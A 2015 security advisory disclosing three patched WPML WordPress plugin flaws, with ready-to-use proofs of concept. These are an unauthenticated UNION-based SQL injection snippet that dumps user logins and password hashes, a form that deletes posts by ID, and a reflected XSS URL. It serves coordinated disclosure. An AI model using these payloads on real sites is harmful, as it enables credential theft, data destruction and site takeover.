WordPress WPML XSS / Deletion / SQL Injection

`OVERVIEW  
==========  
  
WPML is the industry standard for creating multi-lingual WordPress  
sites. Three vulnerabilities were found in the plug-in. The most  
serious of them, an SQL injection problem, allows anyone to read the  
contents of the WordPress database, including user details and  
password hashes, without authentication.  
  
System administrators should update to version 3.1.9.1 released  
earlier this week to resolve the issues.  
  
  
  
DETAILS  
========  
  
1. SQL injection  
  
When WPML processed a HTTP POST request containing the parameter  
”action=wp-link-ajax”, the current language is determined by parsing  
the HTTP referer. The parsed language code is not checked for  
validity, nor SQL-escaped. The user doesn’t need to be logged in.  
  
By sending a carefully crafted referer value with the mentioned POST  
request parameter, an attacker can perform SQL queries on arbitrary  
tables and retrieve their results. In addition to the standard  
WordPress database and tables, the attacker may query all other  
databases and tables accessible to the web backend.  
  
The following HTML snippet demonstrates the vulnerability:  
  
<script>  
var union="select  
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from  
wp_users";  
if (document.location.search.length < 2)  
document.location.search="lang=xx' UNION "+union+" -- -- ";  
</script>  
  
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">  
<input type=hidden name=action value="wp-link-ajax">  
<input type=submit>  
</form>  
  
The results of the SQL query will be shown in the comments feed XML-formatted.  
  
  
  
2. Page/post/menu deletion  
  
WPML contains a ”menu sync” function which helps site administrators  
to keep WordPress menus consistent across different languages. This  
functionality lacked any access control, allowing anyone to delete  
practically all content of the website - posts, pages, and menus.  
  
Example:  
  
<form method=POST  
action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php">  
<input type=hidden name="action" value="icl_msync_confirm">  
<input type=text name="sync" size=50 value="del[x][y][12345]=z">  
<input type=submit>  
</form>  
  
Submitting the above form would delete the row with the ID 12345 in  
the wp_posts database. Several items be deleted with the same request.  
  
  
  
3. Reflected XSS  
  
The ”reminder popup” code intended for administrators in WPML didn’t  
check for login status or nonce. An attacker can direct target users  
to an URL like:  
  
https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f  
  
  
to execute JavaScript in their browser. This example bypasses the  
Chrome XSS Auditor.  
  
In the case of WordPress, XSS triggered by an administrator can lead  
to server-side compromise via the plugin and theme editors.  
  
  
  
CREDITS  
========  
  
The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while  
researching WordPress plugins falling in the scope of the Facebook bug  
bounty program.  
  
The vendor was notified on March 02, 2015 and the patch was released  
on March 10.  
  
Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/  
  
An up-to-date version of this document can be found on our website  
http://klikki.fi .  
  
  
--   
Jouko Pynnönen <[email protected]>  
Klikki Oy - http://klikki.fi  
`